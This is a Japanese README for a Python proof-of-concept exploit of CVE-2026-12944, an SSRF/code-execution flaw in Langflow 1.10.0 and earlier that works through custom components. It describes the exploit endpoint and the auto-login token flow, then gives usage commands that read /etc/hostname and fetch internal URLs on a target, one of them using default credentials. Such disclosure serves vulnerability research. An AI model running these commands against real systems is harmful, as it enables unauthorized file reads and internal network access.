
Python PoCは、カスタムコンポーネント内のurllibを介したLangflow 1.10.0のSSRFであるCVE-2026-12944を悪用し、認証済みの読み取りおよびフェッチ機能を備えています。
Langflow OSS (≤ 1.10.0) — カスタムコンポーネント内の urllib.request / socket を介した任意コード実行を可能にする脆弱性。
コンポーネントスキャナーの拒否リストはこれらの標準ライブラリモジュールを検出できなかった。1.10.1 で修正済み (IBM)。
深刻度: PR:L (公開再現可能 / 低深刻度)
エクスプロイトエンドポイント: POST /api/v1/custom_component
セッション Cookie またはベアラートークンが必要。
--test — 認証不要。公開されている GET /api/v1/version のみを実行する。--read / --fetch — まず認証を行う:
GET /api/v1/auto_login。JSON レスポンスに が含まれている場合、 を送信する (ユーザー名/パスワードは不要)。access_tokenAuthorization: Bearer …application/x-www-form-urlencoded 形式で --uname / --password を使用して POST /api/v1/login を実行する。POST /api/v1/custom_component に送信する。--uname / --password は自動ログインが無効な場合にのみ使用される。デフォルトの標準インストールでは無視される。
認可されたテスト専用。 所有していない、または明示的なテスト許可を得ていないシステムに対してこれを使用しないこと。
要件: Python 3 (標準ライブラリのみ)。
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname
レポート & PoC: ShadowForge Cyber